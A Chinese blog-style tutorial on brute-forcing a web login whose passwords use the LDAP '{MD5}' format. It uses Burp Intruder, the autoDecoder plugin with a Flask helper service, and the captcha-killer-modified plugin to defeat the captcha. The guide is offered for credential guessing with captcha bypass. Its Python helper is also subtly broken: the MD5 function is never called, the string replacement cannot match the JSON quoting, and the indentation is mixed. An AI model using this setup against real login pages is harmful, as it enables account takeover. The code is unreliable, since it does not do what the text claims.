登录口爆破之ldap的md5加密、验证码识别

ldap的md5加密配合autoDecoder插件、captcha-killer-modified插件

需要传入的数据包为:

{"username":"admin","password":"{MD5}ISMvKXpXpadDiUoOSoAfww==","code":"YJIV"}

intruder数据包设置如下:

{"username":"admin","password":"§1§","code":"§JOEJ§"}

intruder设置如下:
登录口爆破之ldap的md5加密、验证码识别_第1张图片

登录口爆破之ldap的md5加密、验证码识别_第2张图片

登录口爆破之ldap的md5加密、验证码识别_第3张图片

由于我们只针对intruder里的账号密码进行爆破,所以解密接口我们用不到,直接捕捉到数据包直接返回即可:

@app.route('/decode',methods=["POST"]) # 不解密  
def decrypt():  
    param = request.form.get('data')  # 获取  post 参数  
	return param  

加密服务端代码如下:

# -*- coding:utf-8 -*-  
# author:f0ngf0ng  
  
# ldap的md5加密爆破  
  
from flask import Flask,Response,request  
from pyDes import *  
import base64,hashlib,json  
  
def hash_md5(data):  
    md = hashlib.md5()  
    md.update(str(data))  
    a = md.digest()  
    b = base64.b64encode(a)  
    return b  
  
app = Flask(__name__)  
  
@app.route('/encode',methods=["POST"])  
def encrypt():  
    param = request.form.get('data')  # 获取  post 参数  
	data = json.loads(param)  
    print(data)  
    encry_param = param.replace( "password': '"+ data['password'],"password': '"+"{MD5}" + data['password']) # 密文替换明文,且添加{MD5}关键字  
    return encry_param  
  
@app.route('/decode',methods=["POST"]) # 不解密  
def decrypt():  
    param = request.form.get('data')  # 获取  post 参数  
	return param  
  
if __name__ == '__main__':  
    app.debug = True # 设置调试模式,生产模式的时候要关掉debug  
	app.run(host="0.0.0.0",port="8888")

运行如下

python flask.py

autoDecoder设置如下:
登录口爆破之ldap的md5加密、验证码识别_第4张图片

captcha-killer-modified插件页面如下:
登录口爆破之ldap的md5加密、验证码识别_第5张图片

爆破如下:
登录口爆破之ldap的md5加密、验证码识别_第6张图片

https://github.com/f0ng/autoDecoder

https://github.com/f0ng/captcha-killer-modified

你可能感兴趣的:(网络安全,burp,网络安全)